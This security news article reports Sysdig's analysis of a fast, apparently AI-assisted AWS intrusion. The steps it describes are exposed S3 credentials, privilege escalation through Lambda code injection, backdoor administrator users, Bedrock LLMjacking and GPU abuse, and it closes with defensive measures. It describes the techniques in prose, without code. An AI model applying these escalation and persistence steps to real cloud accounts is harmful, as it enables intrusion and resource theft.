editorially independent. We may make money when you click on links
to our partners.
Learn More
Threat actors are using artificial intelligence (AI) to accelerate cloud intrusions.
In a recent incident observed by Sysdig researchers, attackers escalated from stolen credentials to full administrative access in an AWS environment in under 10 minutes, illustrating how AI can shorten cloud attack timelines.
“The threat actor achieved administrative privileges in under 10 minutes, compromised 19 distinct AWS principals, and abused both Bedrock models and GPU compute resources,” said the researchers.
Inside the AI-Assisted AWS Intrusion
According to Sysdig’s analysis of the November 2025 incident, the attack began with the discovery of valid AWS credentials exposed in publicly accessible Amazon S3 buckets.
These buckets were used to store Retrieval-Augmented Generation (RAG) data for AI models and contained long-lived access keys that could be abused by anyone who found them.
The exposed credentials belonged to an IAM user with the ReadOnlyAccess policy attached, along with limited permissions for Amazon Bedrock.
Reconnaissance Across AWS and AI Services
Although these privileges did not allow direct administrative actions, they provided broad visibility across the environment.
Using this access, the threat actor conducted extensive reconnaissance across multiple AWS services, including Secrets Manager, Lambda, EC2, ECS, RDS, CloudWatch, and Key Management Service.
They also enumerated Bedrock models and related AI services early in the intrusion, indicating an initial interest in identifying AI-related resources for potential abuse.
Privilege Escalation Through Lambda Code Injection
After mapping the environment, the attacker attempted to escalate privileges by assuming IAM roles commonly associated with administrative access.
When those attempts failed, they pivoted to a more reliable escalation technique: Lambda function code injection.
Because the compromised IAM user had UpdateFunctionCode and UpdateFunctionConfiguration permissions, the attacker was able to modify the code of an existing Lambda function that ran under an overly permissive execution role.
The attacker iterated on this approach several times, ultimately succeeding in creating new access keys for an administrative IAM user.
This step effectively granted full control over the AWS environment without the need for external command-and-control (C2) infrastructure, as the malicious Lambda function returned the newly created credentials directly in its execution output.
Analysis of the injected Lambda code revealed several indicators of AI-assisted development.
The script included detailed exception handling, execution timeout adjustments, and comments written in Serbian.
Researchers also observed behavior consistent with large language model (LLM) hallucinations, such as attempts to assume roles in non-existent AWS account IDs and references to a GitHub repository that does not exist.
Lateral Movement and Persistence
With administrative access secured, the threat actor expanded their foothold by moving laterally across the environment.
They operated across 19 distinct AWS principals, including multiple IAM roles and users, created new access keys, and established a persistent backdoor user with the AdministratorAccess policy attached.
LLMjacking and GPU Resource Abuse
The attacker then shifted focus to LLMjacking, abusing the victim’s Amazon Bedrock access to invoke multiple foundation models, including Claude, DeepSeek, Llama, and Amazon Titan.
Because model invocation logging was disabled, this activity likely went undetected while generating real usage costs for the organization.
In the final stage of the attack, the threat actor provisioned high-end GPU infrastructure for machine learning workloads.
They successfully launched a p4d.24xlarge EC2 instance, which costs approximately $32.77 per hour, and used user data scripts to install CUDA, PyTorch, and other ML frameworks.
The scripts also launched a publicly accessible JupyterLab server, creating a backdoor that would allow continued access to the instance even if AWS credentials were later revoked.
Reducing Cloud Risk in the Age of AI
As AI-assisted cloud attacks become faster and more automated, organizations need defensive controls that go beyond basic misconfiguration fixes.
The following measures focus on reducing privilege exposure, limiting attacker movement, and improving visibility into high-risk cloud and AI activity.
- Enforce strict least-privilege access across IAM users, roles, and Lambda execution roles, and eliminate long-lived access keys in favor of short-lived, role-based credentials.
- Restrict Lambda modification and role-passing capabilities by tightly controlling UpdateFunctionCode, UpdateFunctionConfiguration, and PassRole permissions and limiting deployments to approved CI/CD pipelines.
- Secure AI and cloud data stores by ensuring S3 buckets containing credentials, RAG data, or model artifacts are never public and are continuously monitored for exposure.
- Improve detection of AI-assisted attacks by monitoring for high-velocity enumeration, identity switching, role chaining, and anomalous API activity across cloud services.
- Lock down AI and compute resource usage by enabling Amazon Bedrock model invocation logging, restricting which models can be invoked, and applying quotas and alerts to GPU instance families.
- Reduce blast radius through strong account segmentation, hardened cross-account trust policies, and continuous review of IAM Access Analyzer findings.
- Prepare for rapid containment by retaining immutable audit logs and regularly testing cloud-specific incident response plans, including scenarios involving serverless compromise and AI service abuse.
Together, these steps can help shorten detection timelines and limit the blast radius.
AI Is Accelerating Cloud Attacks
This incident demonstrates how cloud intrusions can escalate rapidly when exposed credentials, permissive identities, and automated tooling are combined.
The increasing adoption of large language models in attack workflows is expected to further reduce the time available for detection and response.
As attacks accelerate and implicit trust breaks down, organizations are increasingly turning to zero-trust to limit access and reduce the impact of compromised identities.
